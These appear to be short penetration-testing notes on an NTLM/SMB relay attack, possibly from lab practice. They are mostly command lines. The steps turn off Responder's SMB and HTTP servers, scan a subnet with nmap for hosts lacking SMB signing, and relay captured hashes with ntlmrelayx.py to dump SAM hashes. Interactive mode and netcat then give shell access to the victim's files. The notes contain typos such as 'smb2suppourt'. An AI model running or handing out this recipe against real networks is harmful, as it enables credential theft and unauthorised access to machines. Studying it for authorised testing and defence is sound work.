Instead of cracking Hashes gathered with responder, we can instead relay those hashes via SMB to specific machines and potentially gain access.
#Edit the Responder config file turn off SMB and HTTP
sudo nano /etc/responder/Responder.conf
#Identify the hosts without SMB signing
nmap --script=smb2-security-mode.nse -p 445 -Pn 10.10.10.0/24
Save the hosts ip address to a file which are disabled with SMB signing, and start the responder.
#Setup your relay
sudo ntlmrelayx.py -tf targets.txt -smb2support
Trigger an Event.
Once the event occured, it started capturing the SAM hashes.
#Interactive mode
sudo ntlmrelayx.py -tf targets.txt -smb2suppourt -i
Use netcat to gain shell
nc 127.0.0.1 11000
Now i can acces the files and folders in the drive.